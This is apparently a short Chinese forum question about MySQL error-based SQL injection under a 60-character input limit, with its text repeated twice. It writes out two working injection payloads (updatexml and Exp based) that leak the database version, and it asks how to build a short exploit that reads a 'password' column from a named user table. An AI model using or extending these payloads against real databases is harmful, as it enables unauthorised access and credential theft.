Mysql报错注入,长度限制
1'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#
1'and Exp(~(select*from(select @@version)a))#
都是能注出数据的
但是程序限制了60个字符,多出的直接截断
表名14个字符:0123456789user
字段8个字符:password
能不能构造读出数据的exp?
1'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#
1'and Exp(~(select*from(select @@version)a))#
都是能注出数据的
但是程序限制了60个字符,多出的直接截断
表名14个字符:0123456789user
字段8个字符:password
能不能构造读出数据的exp?